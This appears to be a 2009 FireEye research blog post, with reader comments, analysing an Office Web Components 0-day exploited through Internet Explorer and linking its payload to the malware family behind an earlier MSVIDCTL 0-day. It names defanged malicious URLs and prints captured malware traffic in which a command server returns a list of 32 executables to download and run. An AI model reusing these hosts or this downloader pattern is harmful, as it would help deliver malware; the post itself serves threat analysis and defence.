Just a day before Patch Tuesday, when Microsoft is going to release couple of patches for DirectShow vulnerabilities including MSVIDCTRL 0-day , IE (Internet Explorer) users are hit by another surprise. A new 0-day vulnerability has been identified in MS office web component and is currently being exploited via the IE scripting interface. There is no patch available at the moment but MS has come up with a workaround.
One of the malicious URL which has been found to exploit this vulnerability is hxxp://www.fdsdffdfsf.cn/of.htm.
Here is what the exploit page looks like:
where a.js looks like this:
If successfully exploited, the above shell code fetches a malware binary from hxxp://www.fdasfadf.cn/new.exe
Let's see what the actual payload i.e new.exe is all about.
Here is VirtusTotal report for new.exe
Upon execution this malware produces outbound communication like this:
GET /hao.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.98765W; Windows NT 5.1; SV1)
Host: www.qvod69.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 1077
Content-Type: text/plain
Last-Modified: Mon, 13 Jul 2009 02:23:59 GMT
Accept-Ranges: bytes
ETag: "20efc5fa603ca1:2ea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jul 2009 02:19:23 GMT
1:hxxp://www.fghndrgse.cn/1.exe
1:hxxp://www.fghndrgse.cn/2.exe
1:hxxp://www.fghndrgse.cn/3.exe
1:hxxp://www.fghndrgse.cn/4.exe
1:hxxp://www.fghndrgse.cn/5.exe
1:hxxp://www.fghndrgse.cn/6.exe
1:hxxp://www.fghndrgse.cn/7.exe
1:hxxp://www.fghndrgse.cn/8.exe
1:hxxp://www.fghndrgse.cn/9.exe
1:hxxp://www.fghndrgse.cn/10.exe
1:hxxp://www.fghndrgse.cn/11.exe
1:hxxp://www.fghndrgse.cn/12.exe
1:hxxp://www.fghndrgse.cn/13.exe
1:hxxp://www.fghndrgse.cn/14.exe
1:hxxp://www.fghndrgse.cn/15.exe
1:hxxp://www.fghndrgse.cn/16.exe
1:hxxp://www.fghndrgse.cn/17.exe
1:hxxp://www.fghndrgse.cn/18.exe
1:hxxp://www.fghndrgse.cn/19.exe
1:hxxp://www.fghndrgse.cn/20.exe
1:hxxp://www.fghndrgse.cn/21.exe
1:hxxp://www.fghndrgse.cn/22.exe
1:hxxp://www.fghndrgse.cn/23.exe
1:hxxp://www.fghndrgse.cn/24.exe
1:hxxp://www.fghndrgse.cn/25.exe
1:hxxp://www.fghndrgse.cn/26.exe
1:hxxp://www.fghndrgse.cn/27.exe
1:hxxp://www.fghndrgse.cn/28.exe
1:hxxp://www.fghndrgse.cn/29.exe
1:hxxp://www.fghndrgse.cn/30.exe
1:hxxp://www.fghndrgse.cn/31.exe
1:hxxp://www.fghndrgse.cn/32.exe
This communication might look familiar to those who got a chance to read my earlier article (Who is Exploiting the Windows 0-day (MSVIDCTL.DLL) ?) which was about a malware who was seen to exploit MSVIDCTRL 0-day. Yes 'new.exe' is the malware variant which belongs to the same family.
ThreatExpert report for new.exe
ThreatExpert report for the malware found to be exploited MSVIDCTRL last week.
The only difference between these two variants is a slightly modified binary and network footprint to evade conventional AVs and IDS signatures. I am not surprised at all that both of these 0-days are being exploited by same malware group. In past we have seen several cases where some of the world's top botnets were found to be controlled by closely linked cyber criminals.
Those who want to recollect might refer to these archived articles:
http://blog.fireeye.com/research/2008/08/srizbi-and-rust.html
http://blog.fireeye.com/research/2008/08/srizbi-and-ru-1.html
http://blog.fireeye.com/research/2008/09/new-axis-of-evi.html
http://blog.fireeye.com/research/2009/02/srizbi-xarvester-and-microsoft.html
Atif Mushtaq @ FireEye Malware Intelligence Lab
Question/Comments : research SHIFT-2 fireeye DOT COM
Thanks guys for pointing it out, link is fixed now...
Posted by: Atif Mushtaq | 2009.07.14 at 11:51 AM
The url is wrong for Virus Totals: Should have an "s" at the end of "analisi" for it to work. (btw, if you spell it correctly, "analysis" it won't work)
So the url should be:
http://www.virustotal.com/analisis/0ff50e3c3b17a0597e0564bdb6413a64d2a540b7cc79ff538b3c7115155c0a46-1247537546
Posted by: Nathan | 2009.07.14 at 08:22 AM
Just a note, the correct VT URL is;
http://www.virustotal.com/analisis/0ff50e3c3b17a0597e0564bdb6413a64d2a540b7cc79ff538b3c7115155c0a46-1247537546
:o)
Posted by: Steven Burn | 2009.07.14 at 07:48 AM
Nice work linking the two 0days, two in two weeks makes for lots of interesting work :).
The VT link returns a 404 btw.
Andrew
Posted by: Andrew | 2009.07.14 at 07:09 AM
fyi the VirusTotal report link is broken.
Posted by: Gible Fog | 2009.07.14 at 02:01 AM